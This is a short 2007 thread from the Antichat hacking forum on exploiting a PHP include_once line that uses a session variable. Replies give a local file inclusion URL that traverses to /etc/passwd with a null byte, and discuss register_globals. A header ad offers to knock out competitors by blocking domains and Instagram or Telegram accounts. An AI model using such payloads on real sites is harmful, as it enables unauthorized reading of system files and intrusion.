Форум АНТИЧАТ

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript
include

Опции темы

Поиск в этой теме

Опции просмотра

include

20.06.2007, 06:01

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

include

Цитата:

18: include_once("../web/".$session_chat[$sid]['asp_login']."/".$session_chat[$sid]['asp_login']."-conf-init.php") ;

у кого какие мысли?
можно раздрочить?

20.06.2007, 10:41

hhover

Познающий

Регистрация: 21.05.2007

Сообщений: 61

Провел на форуме:
79888

Репутация: 145

Код:

/script.php?sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00

20.06.2007, 10:47

_Great_

Флудер

Регистрация: 27.12.2005

Сообщений: 2,372

Провел на форуме:
5339610

Репутация: 4360

Отправить сообщение для _Great_ с помощью ICQ

hhover, здорово, только вот если register_globals=off...

20.06.2007, 11:45

~~KEZ~~

Banned

Регистрация: 18.05.2005

Сообщений: 1,981

Провел на форуме:
1941233

Репутация: 2726

надо тогда так

Код:

/script.php?REGISTER_GLOBALS=ON&sid=1&session_chat[1][asp_login]=../../../../../etc/passwd%00

=\\\\\\\

20.06.2007, 12:23

SMiX

Участник форума

Регистрация: 25.07.2005

Сообщений: 246

Провел на форуме:
457850

Репутация: 174

Ну просто отрубаем куки и смотрим sid в адресах ссылок на странице.

20.06.2007, 12:26

GreenBear

наркоман с медалью

Регистрация: 07.05.2005

Сообщений: 3,704

Провел на форуме:
19975136

Репутация: 4536

Отправить сообщение для GreenBear с помощью ICQ

кез, ты забыл ini_set )

__________________
Фреймворк для спамера :(
Услуги программирования

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Надо компоненты	B1t.exe	С/С++, C#, Delphi, .NET, Asm	6	22.04.2007 00:01
Linux 2.4.21 exploit	FranticEuphoria	*nix	18	23.01.2007 04:57
Устанавливаем Ids	Zitt	Чужие Статьи	0	19.10.2006 00:13

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход